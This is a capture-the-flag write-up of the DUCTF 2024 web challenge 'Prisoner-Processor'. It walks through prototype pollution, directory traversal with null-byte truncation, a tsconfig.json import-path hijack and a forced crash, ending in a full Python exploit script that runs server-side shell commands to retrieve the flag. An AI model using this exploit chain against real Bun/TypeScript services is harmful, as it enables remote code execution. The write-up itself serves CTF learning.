DUCTF 2024 has concluded this summer, and I decided to take a look at it with Maple Bacon and solve a few challenges. This is specifically a writeup for “Prisoner-Processor”, the hardest web challenge available. My teammate Angus and I solved this together. It was a great challenge and ventured into alot of interesting things about Bun and TypeScript, so kudos to the authors for making such an interesting challenge!



The start.sh script is more sus than other conventional start.sh scripts as it will attempt to restart the server 5 times, then copy a backup to the app folder if it couldn’t restart, and retry again in a perpetual loop.


cd /app;
# Loop in case the app crashes for some reason ¯\_(ツ)_/¯
while :; do
    for i in $(seq 1 5); do
        bun run start;
        sleep 1;
    # Okay for some reason something really goofed up...
    # Restoring from backup
    cp -r /home/bun/backup/app/* /app;

It’s technically not wrong to have a start.sh auto-restart a server if it goes down, but there’s a few ways to do that that’s considered “cleaner”. On the infrastructural side, enabling restart: always in the docker-compose.yml file does the same thing, with the added benefit of restarting the whole container, on a clean serving of the app data (no need to copy a backup). Basically, having the app do the restarts in the challenge itself seems weird. This is important for later.


Some ground truths about the challenge:

  • It runs on TypeScript, and the runtime is Bun
  • It’s a prisoner?? database with an “examples” endpoint that gives you a JSON of all of Oceania’s prisoners and their crimes. Each prisoner JSON has properties that are prefixed with signed., and these signed properties are used for signature generation.
  • The app can accept submitted JSON, validate its signature, then use stringify from a yaml module to convert into yaml. The JSON-to-YAML is yeeted into a new file, and the app checks for the existence of an outputPrefix in the JSON data. If it exists, it’s put into the filename as outputPrefix-<random sequence of chars>.yaml and saved into a folder called /app-data/. That file will not be used anywhere else in the app after it’s created.


Bypassing Signature Validation with Top-level Prototype Pollution

In /src/index.ts:

const SIGNED_PREFIX = `signed.`;

const getSignature = (data: any): string => {
  const toSignArray = Object.entries(data).map(([k, v]) => `${k}=${v}`);
  const s = createHmac('sha256', SECRET_KEY)
  return s;

const hasValidSignature = (data: any, signature: string): boolean => {
  const signedInput = getSignature(data);
  return signedInput === signature

const getSignedData = (data: any): any => {
  const signedParams: any = {};
  for (const param in data) {
    if (param.startsWith(SIGNED_PREFIX)) {
      const keyName = param.slice(SIGNED_PREFIX.length);
      signedParams[keyName] = data[param];
  return signedParams;

The above functions are responsible for the signature checking. The signature is used to stop us from creating our own JSON objects. The signature is computed with a secure I’m-not-gonna-try-to-bruteforce method and is based on all properties in the JSON whose key value starts with signed.. If we modify the signed properties in any way, the signatures won’t match and the app will reject our JSON. However, the functions don’t check // don’t care for properties in the JSON whose key value don’t start with signed., so we can freely add arbitrary properties as long as their key doesn’t start with signed., and those additional properties won’t affect the signature. We still wouldn’t be able to make a JSON from scratch due to the I’m-not-gonna-try-to-bruteforce method to make a new signature, but we can copy one from the “examples” endpoint and reuse its signature.

An example JSON file looks like this:

    "signed.name": "jeff",
    "signed.animalType": "emu",
    "signed.age": 12,
    "signed.crime": "assault",
    "signed.description": "clotheslined someone with their neck",
    "signed.start": "2024-03-02T10:45:01Z",
    "signed.release": "2054-03-02T10:45:01Z"

The function getSignedData will be given JSON like this and look for any keys using Object.entries that start with signed., and assign it to an empty object. That object, after having been given all the signed. properties, is then returned.

The assigning is vulnerable to top-level prototype pollution:

    if (param.startsWith(SIGNED_PREFIX)) {
      const keyName = param.slice(SIGNED_PREFIX.length);
      signedParams[keyName] = data[param];

signedParams[keyName] = data[param]; allows you to assign arbitrary properties but only one-layer down. This is not a recursive assignment, so you can’t give whole objects to the data. So we can define a signed.__proto__ as a key and add additional properties in there - and because Object.entries() doesn’t go up the prototype chain during the signature check - but the for (const param in data) loop to assign props DOES go up the prototype chain, it will be added to the object but it won’t violate the signature check. This function is used later on in this snippet of code:

      const body = response.req.valid('json');
      const data = body.data;
      const signedData = getSignedData(data)
      const signature = body.signature;
      if (!hasValidSignature(signedData, signature)) {
        return response.json({ msg: "signatures do no match!" }, 400);
      const outputPrefix = z.string().parse(signedData.outputPrefix ?? "prisoner");
      const outputFile = `${outputPrefix}-${randomBytes(8).toString("hex")}.yaml`;
      if (convertJsonToYaml(data, outputFile)) {
        return response.json({ msg: outputFile });
      } else {
        return response.json({ msg: "failed to convert JSON" }, 500);

As in, the data is stored in the variable signedData. Because the pollution is shallow, we will need to look for properties that the code is checking in the object itself for, AKA, is signedData expected to have any other properties that were not previously defined? The answer is yes: const outputPrefix = z.string().parse(signedData.outputPrefix ?? "prisoner"). outputPrefix will be “prisoner” if it wasn’t defined, otherwise we have full control over that value if we do define it. This is useful for us because outputPrefix is next used to create the filename in outputFile, which is created as a template string with outputPrefix prepended to the rest of the filename. We have, ostensibly, semi-control over the filename. We can certainly LFI and traverse the directories by making outputPrefix a bunch of ../ characters, but before we get into how we’re gonna use it, we gotta review the other bugs first.


The function convertJsonToYaml is defined here. Remember that the app doesn’t actually use the yaml file anywhere, it’s just stored somewhere.

const convertJsonToYaml = (data: any, outputFileString: string): boolean => {
  if (checkIfContainsBannedString(outputFileString)) {
    return false
  const filePath = `${OUTPUT_YAML_FOLDER}/${outputFileString}`;
  const outputFile = Bun.file(filePath);
  // Prevent accidental overwriting of app files
  if (existsSync(outputFile)) {
    return false

  try {
    const yamlData = stringify(data);
    Bun.write(outputFile, yamlData);
    return true;
  } catch (error) {
    return false;

Tracing the logic from above, the arg outputFileString will be the outputFile that we can control the prefix of. First, it’s checked to see if we don’t have any banned words:

  "app", "src", ".ts", "node", "package", "bun", "home", "etc", "usr", "opt", "tmp", "index", ".sh"

Then, Bun runtime will create a “file” object to perform file I/O stuff on, and the app checks if the file object points to something that already exists. This barricades us from doing too much directory traversal with outputPrefix, because we can’t use any words in BANNED_STRINGS and we also can’t overwrite some other file. I also didn’t really touch on the fact that the file has a bunch of random characters appended to it, and finally, the filetype .yaml added as well, so we can only ever define yaml files, anyway. This situation seems like a good case for null-byte termination. Luckily for us, Bun.file() will seemingly(?) not notice the nullbyte, so something like viewie.txt\00<randomcharacters>.yaml will look like viewie.txt\00<randomcharacters>.yaml. But when Bun.write() is called, something like viewie.txt\00<randomcharacters>.yaml is instead seen as viewie.txt as the write operation implicitly terminates at the null byte. I may be wrong on who’s recognizing the nullbyte, but the point is, we can inject a nullbyte into our outputPrefix to remove the <randomcharacters>.yaml suffix to the filename, AND bypass the existsSync check so we can overwrite important files, and they can be of any extension (not just yaml).

So what about the BANNED_STRINGS list?

“Unfortunately, tsconfig.json isn’t real JSON”

So, to recap:

  1. We can add arbitrary properties to a JSON and include a __proto__ key which contains outputPrefix.
  2. You can make outputPrefix navigate to any file and overwrite it, and you just need to add a null byte to cancel out the random garbage appended to it.

So we have the ability to write to any writable directory in the app. The final few caveats are the fact that while we control the filename and write to anywhere, remember the contents are JSON that has been YAML-ified. So even if we rename our file to somethingelse.js, the file contents will still be a YAML file of prisoner data, NOT js.

Looking at the BANNED_WORDS list and cross-referencing with the directory structure of the challenge, we can’t really go anywhere except for the files in green.


Actually just kidding, all those files are in /app, which is part of the BANNED_WORDS list. Shame.

Good thing that proc/self/cwd is a symlink to /app.

tsconfig.json isn't real json

Minor tangent aside, the only remotely interesting file in there to use, is tsconfig.json. Right now, it doesn’t have much to it. But when looking through the documentation for it, we came across an interesting property, path re-mapping:

the Bun runtime will re-map import paths according to the compilerOptions.paths field in tsconfig.json.

More specifically, according to the official TypeScript documentation:

A series of entries which re-map imports to lookup locations relative to the baseUrl if set, or to the tsconfig file itself otherwise. There is a larger coverage of paths in the moduleResolution reference page. paths lets you declare how TypeScript should resolve an import in your require/imports.

Any require or import in your typescript will be affected by this:

//example tsconfig.json
  "compilerOptions": {
    "paths": {
      "jquery": ["./vendor/jquery/dist/jquery"]

Then, import 'jquery' in your TS file will make the runtime look for the jquery module in ./vendor/jquery/dist/jquery. We can freely overwrite this file and have it applied when the app crashes. Remember the start.sh script? It will attempt to restart the app if it detects a crash, and when Bun restarts, it will look for a tsconfig.json to apply. If we modify the tsconfig.json to include this property, we can basically tell Bun what code to run for certain imports, allowing us arbitrary code exec this way.

If we were to use path re-mapping, what would be a good candidate to re-map? Our first answer to this was the yaml library, as while it’s used in the app to YAML-ify the JSON data, ther are no other use cases in the app for YAML to be parsed, loaded, etc etc. So, the re-mapping candidate for us will be yaml. When Bun comes across the import { stringify } from 'yaml'; line in index.ts, the tsconfig.json will tell Bun to look to where we tell it to go instead.

So, gathering all our bugs, if we can make the filename tsconfig.json\00<randomcharacters>.yaml, it will resolve to and overwrite tsconfig.json. Wait, our file is still YAML. So when Bun attempts to read the JSON, it will error out! tsconfig.json needs to be valid JSON after all, right?


tsconfig.json isn't real json

I’ll spare the details of how we tried to find all the weird and interesting properties that tsconfig.json will allow for, and how the compiler will parse it.

Here are some things that make it different from regular JSON:

  1. It can support comment syntax like /**/ which technically shouldn’t be allowed in JSON formats.
  2. Yaml allows // to be used as a key and naturally, Bun will ignore whatever comes after it
  3. You can give it a valid JSON structure, then invalid JSON, and the compiler won’t complain.

Anyway, the following “JSON” is a valid, readable and parsable tsconfig.json.

//: |-
signed.name: jeff
signed.animalType: emu
signed.age: 12
signed.crime: assault
signed.description: clotheslined someone with their neck
signed.start: 2024-03-02T10:45:01Z
signed.release: 2054-03-02T10:45:01Z
  outputPrefix: "../../../../proc/self/cwd/tsconfig.json\0"

We can finally combine all of this into the final solve.


  1. Copy an example prisoner JSON file and add your tsconfig path re-mapping:
"//": "\n{\"compilerOptions\":{\"paths\":{\"yaml\":[\"./examples/julia.js\"]}}}",

Which will be valid tsconfig.json. We put our js file into the examples folder simply cause it’s an rwx folder. Then add:

        "signed.__proto__": {

The nullbyte to remove the <randomcharacters>.yaml filename, the directory traversal and proc/self/cwd to get the symlink to /app and bypass the BANNED_WORDS list.

  1. Make a javascript file and yeet into /examples for RCE (exec getflag and whatever)

  2. Crash the app (we did this by trying to write to proc/self/mem) to force a restart and have our overwritten tsconfig.json apply to the app

import requests


    host = "https://web-prisoner-processor-c8d94eb745951d8e.2024.ductf.dev"
    host = "http://localhost:1337"

# 0. get signature
sig = requests.get(host + "/examples").json()["examples"][0]["signature"]

# 1. overwrite tsconfig.json
requests.post(host+"/convert-to-yaml", json={
    "data": {
        "//": "\n{\"compilerOptions\":{\"paths\":{\"yaml\":[\"./examples/julia.js\"]}}}",
        "signed.description":"clotheslined someone with their neck",
        # Object.entries ignores this but for ... in won't
        "signed.__proto__": {
            "outputPrefix":"../../../../proc/self/cwd/tsconfig.json\u0000" #nullbyte to make our own files
    "signature": sig

# 2. write rce to examples/julia.js
requests.post(host+"/convert-to-yaml", json={
    "data": {
        "//": """
var dog = 'sed -i "s/signed/$(/bin/getflag)/g" /app/examples/jeff.json';

exports.stringify = function(dawg) {return dawg;}
        "signed.description":"clotheslined someone with their neck",
        "signed.__proto__": {
            "outputPrefix":"../../../../proc/self/cwd/examples/julia.js\u0000 */ //"
    "signature": sig

# 3. crash
    requests.post(host+"/convert-to-yaml", json={
        "data": {
            "signed.description":"clotheslined someone with their neck",
            "signed.__proto__": {
        "signature": sig
except requests.exceptions.ConnectionError:

# 4. get flag (assuming server takes <5 seconds to come back up)
import time
print("flag:", list(requests.get(host + "/examples").json()["examples"][0]["data"].keys())[0][:-len(".name")])

flag: DUCTF{bUnBuNbUNbVN_hOn0_tH15_aPp_i5_d0n3!!!one1!!!!}